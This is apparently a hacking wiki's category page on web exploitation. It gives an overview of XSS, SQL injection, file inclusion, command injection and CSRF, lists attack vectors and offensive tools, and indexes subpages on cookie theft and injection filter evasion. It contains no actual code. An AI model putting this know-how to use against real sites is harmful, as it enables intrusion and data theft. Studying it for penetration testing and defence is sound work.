Category:Web exploitation
Web exploitation is the attacking and taking advantage of a vulnerability in a computer system through a web application. There are numerous ways to exploit vulnerabilities so only some of the basics will be covered here. The topics and tools covered in this series can be dangerous enough to compromize an HTTP server's database, code, or allow a remote shell.
Many web sites run web applications for the purpose of dynamic content. Usually this would include an SQL database backend of some sort, and a web application (like forums, talkboards, content management systems, and blogs) to interface with the SQL database. Therefore the affected languages are anything that can be used as an interface over HTTP to dynamic content.
When penetration testing a site, it is different than penetration testing a network, and different than penetration testing a server. However, it is good to point out, that by compromising one of these layers, the other layers can be compromised in the future. Web application vulnerabilities are currently the most prominent vulnerabilities exploited by cybercriminals.
It is a crime to use techniques or tools on this page against any system without written authorization unless the system in question belongs to you |
Special thanks to hatter for his contributions to this article.
Contents
Affected Languages
- PHP
- Perl
- CFM
- ASP
- Ruby
- Python
- Any CGI interfaced language may also be vulnerable to web exploitation.
Types of Exploitation
- Vanguard can be used to test for many of these vulnerabilities.
- XSS can be used to capture logins and sessions or a page redirect if a user clicks a malicious link.
- SQL injection can be used to copy, modify, or delete the affected application's database, and in some cases create a remote shell on the affected system, and sometimes can allow an attacker to backdoor a web application.
- File inclusion vulnerabilities can be exploited to create a remote shell, which can lead to database manipulation and file tampering.
- Command injection effectively hands a remote shell to an attacker by arbitrary bash or MS-DOS command execution.
- CSRF allows an attacker to perform actions as any unsuspecting user that clicks a link or loads a page on a separate domain from the affected site while logged into the affected site.
- XSCF Sends different data to different hosts. This way, if a piece of malware is able to recognize the source machine as something analyzing it, the malware can return something innocent while normal users are directed to something malicious.
- XSRF is using XSS to produce a same-domain URL that will perform actions as the logged in user via a CSRF attack.
- Mass assignment abuse can allow an attacker to directly overwrite database values without having to write any SQL queries and without the use of SQL injection.
Attack Vectors
- HTTP GET request parameters (Variables in the URL)
Rewritten or "clean" URL's can have GET parameters too! HTTP HEAD requests can also exploit poor input sanitizing in these parameters.
- HTTP POST request parameters (Fields and fieldsets in web forms)
You can send post parameters to a URL that has GET parameters!
- HTTP Header parameters (Variables passed by header information)
This includes cookies, user agents, connection type, and more
Fingerprinting
Because web vulnerability identification sometimes requires that you identify the backbone of a particular web configuration, fingerprinting is commonly used as a medium to gain information about commonly used platforms in an attempt to identify them through common fingerprints.
These might include things such as common headers, footers, comments in code- or simply the existence of a very particular page. Fingerprinting is a key aspect in determining vulnerabilities in specific software packages, and might also be used in conjunction with a search engine in order to get large lists of vulnerable hosts through searching for a single commonality.
Web Exploitation Tools
In House
- Kolkata - Web application static file analysis based fingerprinting engine with yml based configuration
- Vanguard - Web application vulnerability testing and exploitation framework
- Lfi_autopwn.pl - A file inclusion based exploit utility to emulate a remote shell
- MySql 5 Enumeration - A proof of concept for boolean enumeration with SQL injection exploitation from the command line.
- GScrape - Google dork testing engine
Third party:
Pages in category "Web exploitation"
The following 100 pages are in this category, out of 100 total.
B
C
- Cause of sql injection
- Coldfusion admin subvert outgoing firewall
- Coldfusion admin to command execution
- Coldfusion administrator authentication bypass
- Coldfusion cfexecute sandbox bypass
- Coldfusion datasource password decryption
- Coldfusion remote authentication credentials disclosure
- Command Injection
- Command injection exploit
- Command injection on unix
- Command injection vulnerability
- Command injection with perl
- Configuring vanguard modules
- Content forgery
- Cookie attacks
- CSRF
G
M
P
S
- SQL injection
- Sql injection byte extraction
- Sql injection cheat sheets
- Sql injection filter evading version fingerprint
- Sql injection information schema
- Sql injection precomputation
- Sql injection script
- Sql injection test cheat sheet
- Sql injection time based byte extraction
- Sql injection timing attack with boolean enumeration
- Sql injection with regular expressions
- Sql injection without commas
- Sql injection without quotes
- Sql injection without tags
- Sql injection without whitespace
- SQL injection/Blind/Comparative precomputation
- SQL injection/mysqli-blindutils
- SQL injection/mysqli-blindutils/sqli-p.pl
- Sqli
- Steal cookies
- Stealing cookies through xss